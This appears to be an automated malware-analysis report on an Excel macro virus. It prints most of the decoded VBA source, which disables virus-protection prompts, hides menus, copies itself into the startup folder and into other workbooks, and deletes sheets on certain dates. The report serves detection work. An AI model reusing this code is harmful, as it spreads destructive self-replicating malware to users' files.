Verdict: MALICIOUS
Risk Score: 220

Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
The file is an Excel document containing VBA macros, including an Auto_Open macro, which is a common technique for executing malicious code upon opening. The script attempts to save a file named 'FUCKPOL.XLM' to the startup path, indicating a likely downloader or dropper functionality. The ClamAV detections 'Win.Trojan.Pivis-2' and 'Xls.Trojan.Neg-4' further support its malicious nature.
Heuristics (4)

- ClamAV: Win.Trojan.Pivis-2 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Win.Trojan.Pivis-2
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Auto_Open macro (high, OLE_VBA_AUTO): Auto_Open macro
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE): Auto_Close macro
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5451 bytes |

SHA-256: a1e8b706d069ac185db2876655105c9e8dadeeaa13d29d14aa1b588b87e8b3c7
Detection (ClamAV): Xls.Trojan.Neg-4
Obfuscation or payload: unlikely
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "Police"
Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
    On Error Resume Next
    With Options
        .ConfirmConversions = False
        .VirusProtection = False
        .SaveNormalPrompt = False
    End With
    Application.ScreenUpdating = False
    Application.DisplayStatusBar = False
    Application.DisplayAlerts = False
    Options.VirusProtection = False
    CommandBars("tools").Controls("Macro").Delete
    CommandBars("tools").Controls("Customize...").Delete
    CommandBars("view").Controls("Toolbars").Delete
    CommandBars("view").Controls("Status Bar").Delete
    CommandBars("window").Controls("Unhide...").Delete
    If spy() Then
        GoTo shotme:
    Else
        fire
    End If
shotme:
    Application.OnSheetActivate = "FUCKPOL.XLM!action"
bye:
    Call effect
End Sub
Function spy() As Boolean
Attribute spy.VB_ProcData.VB_Invoke_Func = " \n14"
    spy = False
    For x = 1 To Application.Workbooks.Count
        If Application.Workbooks(x).Name = "FUCKPOL.XLM" Then
            For y = 1 To Application.Workbooks("FUCKPOL.XLM").Modules.Count
                If Application.Workbooks("FUCKPOL.XLM").Modules(y).Name = "Police" Then
                    spy = True
                End If
            Next y
        End If
    Next x
End Function
Function fire()
Attribute fire.VB_ProcData.VB_Invoke_Func = " \n14"
    activebook = ActiveWorkbook.Name
    Workbooks(activebook).SaveCopyAs Application.StartupPath + "\FUCKPOL.XLM"
    Workbooks.Open (Application.StartupPath + "\FUCKPOL.XLM")
    Windows("FUCKPOL.XLM").Visible = False
    Application.Workbooks("FUCKPOL.XLM").Save
End Function
Function statusme() As Boolean
Attribute statusme.VB_ProcData.VB_Invoke_Func = " \n14"
    activebook = ActiveWorkbook.Name
    statusme = False
    For y = 1 To Application.Workbooks(activebook).Modules.Count
        If Application.Workbooks(activebook).Modules(y).Name = "Police" Then
            statusme = True
        End If
    Next y
End Function
Sub action()
Attribute action.VB_ProcData.VB_Invoke_Func = " \n14"
    oactivebook = ActiveWorkbook.Name
    If statusme() Then
        GoTo bye2
    Else
    End If
    Application.ScreenUpdating = False
    Application.Windows("FUCKPOL.XLM").Visible = True
    Workbooks("FUCKPOL.XLM").Activate
    Sheets("Police").Visible = True
    Workbooks("FUCKPOL.XLM").Sheets("Police").Copy Before:=Workbooks(oactivebook).Sheets(1)
    Workbooks(oactivebook).Sheets("Police").Visible = False
    Workbooks("FUCKPOL.XLM").Sheets("Police").Visible = False
    Windows("FUCKPOL.XLM").Visible = False
bye2:
    Close
End Sub
Sub Auto_Close()
Attribute Auto_Close.VB_ProcData.VB_Invoke_Func = " \n14"
    On Error GoTo bye3
    Application.DisplayAlerts = False
    Application.Workbooks("FUCKPOL.XLM").Save
    Application.ActiveWorkbook.Save
bye3:
End Sub
Sub effect()
Attribute effect.VB_ProcData.VB_Invoke_Func = " \n14"
    If Application.UserName = "foxz" And Application.OrganizationName = "NoMercyVirusTeam" Then
        GoTo boss
    Else
    End If
    If Day(Date) = "13" Or Day(Date) = "1" Or Day(Date) = "31" Then
        ActiveWindow.SelectedSheets.Delete
        Assistant.Visible = True
        With Assistant.NewBalloon
            .Icon = msoIconAlert
            .Text = "Six students of Universitas Trisakti, Jakarta, died from bullets fired by security personnel during an action of concern staged by thousands of students at the campus of Universitas Trisakti, Grogol, West Jakarta, on Tuesday (12/5). The six students were shot while on campus by a flurry of bullets, suspected to be fired by security troops on the Grogol fly-over. Dozens of other students suffered serious and minor injuries."
            .Heading = "XM97.Fucking Police"
            .Animation = msoAnimationEmptyTrash
            .Show
        End With
        Assistant.Visible = False
        Assistant.Visible = True
        With Assistant.NewBalloon
            .Icon = msoIconAlert
            .Text = "Until this report was prepared, around 200 students were still waiting in the corridors of the Sumber Waras Hospital, guarding their fellow-students still being treated in the Emergency Unit, as well as the remains of their colleagues laying in state. A moving atmosphere prevailed around t
```

... (truncated)